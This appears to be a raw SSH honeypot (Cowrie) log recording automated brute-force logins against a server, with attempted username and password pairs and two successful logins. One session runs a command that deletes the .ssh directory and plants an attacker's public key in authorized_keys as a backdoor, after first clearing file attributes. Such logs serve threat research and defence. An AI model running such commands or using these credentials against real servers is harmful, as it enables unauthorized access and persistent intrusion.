{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54782,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3b647481b5e","protocol":"ssh","message":"New connection: 212.227.125.160:54782 (1.2.3.4:22) [session: c3b647481b5e]","sensor":"my-vps","timestamp":"2025-08-28T03:39:51.269764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:51.270875Z","src_ip":"212.227.125.160","session":"c3b647481b5e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:51.486275Z","src_ip":"212.227.125.160","session":"c3b647481b5e"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-28T03:39:52.350844Z","src_ip":"212.227.125.160","session":"c3b647481b5e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:39:53.569050Z","src_ip":"212.227.125.160","session":"c3b647481b5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47872,"dst_ip":"1.2.3.4","dst_port":22,"session":"395593f9c948","protocol":"ssh","message":"New connection: 212.227.235.229:47872 (1.2.3.4:22) [session: 395593f9c948]","sensor":"my-vps","timestamp":"2025-08-28T03:39:59.730321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:39:59.731307Z","src_ip":"212.227.235.229","session":"395593f9c948"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:39:59.985930Z","src_ip":"212.227.235.229","session":"395593f9c948"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":64788,"dst_ip":"1.2.3.4","dst_port":22,"session":"b89f72db5664","protocol":"ssh","message":"New connection: 45.125.211.194:64788 (1.2.3.4:22) [session: b89f72db5664]","sensor":"my-vps","timestamp":"2025-08-28T03:40:00.175031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:00.178087Z","src_ip":"45.125.211.194","session":"b89f72db5664"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:00.384802Z","src_ip":"45.125.211.194","session":"b89f72db5664"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:00.752787Z","src_ip":"212.227.235.229","session":"395593f9c948"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:01.214725Z","src_ip":"45.125.211.194","session":"b89f72db5664"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:02.009660Z","src_ip":"212.227.235.229","session":"395593f9c948"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:02.424771Z","src_ip":"45.125.211.194","session":"b89f72db5664"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58314,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a40762258e0","protocol":"ssh","message":"New connection: 212.227.235.229:58314 (1.2.3.4:22) [session: 7a40762258e0]","sensor":"my-vps","timestamp":"2025-08-28T03:40:06.336765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:06.337799Z","src_ip":"212.227.235.229","session":"7a40762258e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:06.598176Z","src_ip":"212.227.235.229","session":"7a40762258e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:40:07.401989Z","src_ip":"212.227.235.229","session":"7a40762258e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:40:08.013518Z","src_ip":"212.227.235.229","session":"7a40762258e0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:40:08.014313Z","src_ip":"212.227.235.229","session":"7a40762258e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:08.275810Z","src_ip":"212.227.235.229","session":"7a40762258e0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:08.277045Z","src_ip":"212.227.235.229","session":"7a40762258e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57868,"dst_ip":"1.2.3.4","dst_port":22,"session":"850f4fd6db7c","protocol":"ssh","message":"New connection: 212.227.125.160:57868 (1.2.3.4:22) [session: 850f4fd6db7c]","sensor":"my-vps","timestamp":"2025-08-28T03:40:09.331175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:09.333062Z","src_ip":"212.227.125.160","session":"850f4fd6db7c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:09.545866Z","src_ip":"212.227.125.160","session":"850f4fd6db7c"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:10.183321Z","src_ip":"212.227.125.160","session":"850f4fd6db7c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:11.397898Z","src_ip":"212.227.125.160","session":"850f4fd6db7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46135,"dst_ip":"1.2.3.4","dst_port":22,"session":"24cd5f9e181b","protocol":"ssh","message":"New connection: 212.227.235.229:46135 (1.2.3.4:22) [session: 24cd5f9e181b]","sensor":"my-vps","timestamp":"2025-08-28T03:40:11.468522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:40:11.469389Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:40:11.566396Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.login.success","username":"root","password":"Nc123456","message":"login attempt [root/Nc123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:40:11.985590Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:40:12.194872Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.195569Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.196574Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.437755Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:40:12.644632Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.645495Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.744061Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.745250Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46136,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b2643be500f","protocol":"ssh","message":"New connection: 212.227.235.229:46136 (1.2.3.4:22) [session: 2b2643be500f]","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.841677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.842368Z","src_ip":"212.227.235.229","session":"2b2643be500f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:40:12.943326Z","src_ip":"212.227.235.229","session":"2b2643be500f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:13.357228Z","src_ip":"212.227.235.229","session":"2b2643be500f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36108,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d34daa076b7","protocol":"ssh","message":"New connection: 212.227.235.229:36108 (1.2.3.4:22) [session: 8d34daa076b7]","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.165954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.167024Z","src_ip":"212.227.235.229","session":"8d34daa076b7"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.271133Z","src_ip":"212.227.235.229","session":"8d34daa076b7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.452432Z","src_ip":"212.227.235.229","session":"2b2643be500f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46137,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebb775bc4705","protocol":"ssh","message":"New connection: 212.227.235.229:46137 (1.2.3.4:22) [session: ebb775bc4705]","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.542817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.562279Z","src_ip":"212.227.235.229","session":"ebb775bc4705"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay123","message":"login attempt [clay/clay123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.587210Z","src_ip":"212.227.235.229","session":"8d34daa076b7"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":26021,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5b56a79c5ba","protocol":"ssh","message":"New connection: 45.125.211.194:26021 (1.2.3.4:22) [session: b5b56a79c5ba]","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.645360Z"}
